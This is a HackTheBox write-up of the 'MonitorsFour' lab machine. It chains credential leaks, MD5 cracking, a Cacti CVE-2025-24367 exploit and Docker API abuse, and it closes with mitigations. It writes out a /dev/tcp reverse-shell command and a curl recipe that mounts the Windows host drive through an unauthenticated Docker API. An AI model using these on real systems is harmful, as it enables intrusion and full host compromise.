HTB Writeup - MonitorsFour - HTB Machines | Wael Rdifi

Difficulty: Easy

Operating System: Windows

Target IP: 10.129.133.214

Attack Vector: Cacti RCE → Docker Socket Escape → Windows Host Access

---

# Summary

MonitorsFour is an Easy-rated Windows machine on HackTheBox that demonstrates a real-world attack chain combining web application exploitation, Docker container escape, and Windows privilege escalation. The path to root involves:

1. Enumerating web services to discover Cacti monitoring platform

2. Exploiting CVE-2025-24367 in Cacti to gain initial foothold as www-data

3. Discovering exposed Docker socket at 192.168.65.7:2375

4. Leveraging CVE-2025-9074 (Docker API abuse) to escape container

5. Mounting Windows C: drive and accessing Administrator files

---

# Reconnaissance

# Port Scanning

Initial reconnaissance revealed two open ports:

Command Line Prompt

rustscan -a 10.129.133.214

Open Ports:

80/tcp - HTTP (nginx)
5985/tcp - WinRM (Windows Remote Management)

# Web Enumeration

Command Line Prompt

# Add to hosts file
echo "10.129.133.214 monitorsfour.htb cacti.monitorsfour.htb" | sudo tee -a /etc/hosts

# Directory fuzzing
feroxbuster -u http://monitorsfour.htb/ -w /usr/share/seclists/Discovery/Web-Content/common.txt

Key Findings:

Main site: http://monitorsfour.htb
Environment file exposed: http://monitorsfour.htb/.env
Cacti subdomain: http://cacti.monitorsfour.htb/cacti/

# Exposed Credentials

The .env file revealed database credentials:

plaintext

DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r

# API Enumeration

Testing the API endpoint revealed an IDOR vulnerability:

Command Line Prompt

curl -s "http://monitorsfour.htb/api/v1/user?id=2&token=0" | jq

User Credentials Found:

json

{
  "id": 2,
  "username": "admin",
  "email": "admin@monitorsfour.htb",
  "password": "56b32eb43e6f15395f6c46c1c9e1cd36",
  "role": "super user",
  "token": "8024b78f83f102da4f",
  "name": "Marcus Higgins",
  "position": "System Administrator"
}

Additional users found at IDs 5, 6, and 7.

# Password Cracking

Command Line Prompt

echo "56b32eb43e6f15395f6c46c1c9e1cd36" > hash.txt
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Result: wonderful1

Credentials: marcus:wonderful1

---

# Initial Access - Cacti CVE-2025-24367

Accessed Cacti at http://cacti.monitorsfour.htb/cacti/ with credentials:

Username: `marcus`
Password: `wonderful1`

Cacti Version: 1.2.28

# Exploitation

Used CVE-2025-24367 exploit from: https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC

Command Line Prompt

cd /tmp
git clone https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC
cd CVE-2025-24367-Cacti-PoC

# Start listener
nc -lvnp 4444

# Run exploit
python3 exploit.py -u marcus -p wonderful1 -i 10.10.14.30 -l 4444 -url http://cacti.monitorsfour.htb

Exploit Output:

plaintext

[+] Cacti Instance Found!
[+] Serving HTTP on port 80
[+] Login Successful!
[+] Got graph ID: 226
[i] Created PHP filename: UVbBH.php
[+] Got payload: /bash
[+] Hit timeout, looks good for shell, check your listener!

Shell Obtained:

Command Line Prompt

www-data@821fbd6a43fa:~/html/cacti$

# User Flag

Once inside the container, located user flag:

Command Line Prompt

find /host_root/Users -name user.txt 2>/dev/null
cat /host_root/Users/marcus/Desktop/user.txt

User Flag: [USER_FLAG_HERE]

---

# Privilege Escalation - Docker Socket Escape

# Container Enumeration

Command Line Prompt

# Check environment
whoami              # www-data
hostname            # 821fbd6a43fa
cat /.dockerenv     # Confirmed Docker container

# Find Docker gateway
ip route show default
# default via 172.18.0.1 dev eth0

# Check for alternate gateways
ip addr show
# inet 172.18.0.2/16

# Docker Socket Discovery

Tested multiple Docker API endpoints:

Command Line Prompt

# Standard Docker Desktop endpoint
curl http://192.168.65.7:2375/info

# Container gateway
curl http://172.18.0.1:2375/info

Docker API accessible at: 192.168.65.7:2375 ✓

# CVE-2025-9074 - Docker API Abuse

This vulnerability allows an attacker with access to an unauthenticated Docker API to:

1. Create privileged containers

2. Mount the host filesystem

3. Execute commands with root privileges on the host

# Exploitation Steps

Step 1: Start listener for root shell

Command Line Prompt

nc -lvnp 1337

Step 2: Create privileged container with host filesystem mounted

Command Line Prompt

curl -X POST -H "Content-Type: application/json" \
  -d '{
    "Image":"docker_setup-nginx-php:latest",
    "Cmd":["bash","-c","bash -i >& /dev/tcp/10.10.14.30/1337 0>&1"],
    "HostConfig":{
      "Binds":["/mnt/host/c:/fucked"]
    }
  }' \
  -o xx.json \
  http://192.168.65.7:2375/containers/create

Explanation:

`Image`: Uses existing image in Docker cache
`Cmd`: Executes reverse shell back to attacker
`Binds`: Mounts Windows C: drive to `/fucked` in container
`/mnt/host/c`: Docker Desktop WSL2 path to Windows C: drive

Step 3: Extract container ID

Command Line Prompt

varr=$(cut -d'"' -f4 xx.json)
echo $varr  # Container ID

Step 4: Start the container

Command Line Prompt

curl -X POST -d '' http://192.168.65.7:2375/containers/$varr/start

# Root Shell Obtained

Command Line Prompt

listening on [any] 1337 ...
connect to [10.10.14.30] from (UNKNOWN) [10.129.133.214] 49623
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@db7424878135:/var/www/html#

---

# Root Flag

# Navigate to Mounted Windows Filesystem

Command Line Prompt

cd /fucked
ls
# $RECYCLE.BIN, Program Files, Users, Windows, etc.

cd Users
ls
# Administrator, marcus, Public

cd Administrator/Desktop
ls
# desktop.ini, root.txt

cat root.txt

Root Flag: `8668a049358a4435..........

---

# Vulnerability Chain Summary

1. Information Disclosure - .env file exposed database credentials

2. IDOR (Insecure Direct Object Reference) - API allowed accessing any user data

3. Weak Password Hashing - MD5 hash easily cracked

4. CVE-2025-24367 - Cacti RCE via graph template exploitation

5. CVE-2025-9074 - Unauthenticated Docker API exposure

6. Insecure Container Configuration - Docker socket accessible from container

7. Excessive Permissions - Container able to mount host filesystem

---

# Key Techniques Used

# Web Application Testing

Directory fuzzing with feroxbuster
API endpoint enumeration
IDOR vulnerability exploitation

# Password Attacks

MD5 hash cracking with john/hashcat
Credential reuse testing

# Container Escape

Docker socket enumeration
Docker API abuse
Host filesystem mounting

# Post-Exploitation

Container pivot techniques
Windows filesystem navigation from Linux container

---

# Mitigation Recommendations

1. Secure Configuration Files

Never expose `.env` files publicly
Use proper `.gitignore` rules
Implement web server restrictions

2. API Security

Implement proper authentication/authorization
Validate token parameters
Use rate limiting
Prevent IDOR with indirect references

3. Password Security

Use strong hashing (bcrypt, Argon2)
Never use MD5/SHA1 for passwords
Implement password complexity requirements

4. Cacti Hardening

Update to latest version (patch CVE-2025-24367)
Restrict access to admin interface
Use strong authentication

5. Docker Security

Never expose Docker socket to containers
Use authentication on Docker API
Implement proper network segmentation
Use Docker security scanning
Apply principle of least privilege

6. Container Hardening

Don't run containers as root
Use read-only root filesystems
Limit container capabilities
Implement AppArmor/SELinux policies

---

# Tools Used

**rustscan** - Port scanning
**feroxbuster** - Directory fuzzing
**curl** - API testing and Docker API exploitation
**john/hashcat** - Password cracking
**netcat** - Reverse shell listener
**CVE-2025-24367 PoC** - Cacti exploitation
**jq** - JSON parsing

---

# References

CVE-2025-24367: https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC
CVE-2025-9074: Docker API Abuse
Docker Security Best Practices: https://docs.docker.com/engine/security/
Cacti Security Advisories: https://github.com/Cacti/cacti/security/advisories

---

# Timeline

1. 00:00 - Port scan & web enumeration

2. 00:05 - Discover .env file and API IDOR

3. 00:10 - Crack MD5 hash → wonderful1

4. 00:15 - Login to Cacti with marcus:wonderful1

5. 00:20 - Exploit CVE-2025-24367 → www-data shell

6. 00:25 - Enumerate Docker environment

7. 00:30 - Discover Docker API at 192.168.65.7:2375

8. 00:35 - Exploit CVE-2025-9074 → root shell

9. 00:40 - Access Windows filesystem → root flag

Total Time: ~40 minutes

---

# Flags

**User Flag:** Located at `/fucked/Users/marcus/Desktop/user.txt`
**Root Flag:** `8668a049.......

---

*Writeup by: bughunt3r*

*Date: December 6, 2025*

*Machine: MonitorsFour (HackTheBox)*

# Summary

# Reconnaissance

# Port Scanning

# Web Enumeration

# Exposed Credentials

# API Enumeration

# Password Cracking

# Initial Access - Cacti CVE-2025-24367

# Cacti Login

# Exploitation

# User Flag

# Privilege Escalation - Docker Socket Escape

# Container Enumeration

# Docker Socket Discovery

# CVE-2025-9074 - Docker API Abuse

# Exploitation Steps

# Root Shell Obtained

# Root Flag

# Navigate to Mounted Windows Filesystem

# Vulnerability Chain Summary

# Key Techniques Used

# Web Application Testing

# Password Attacks

# Container Escape

# Post-Exploitation

# Mitigation Recommendations

# Tools Used

# References

# Timeline

# Flags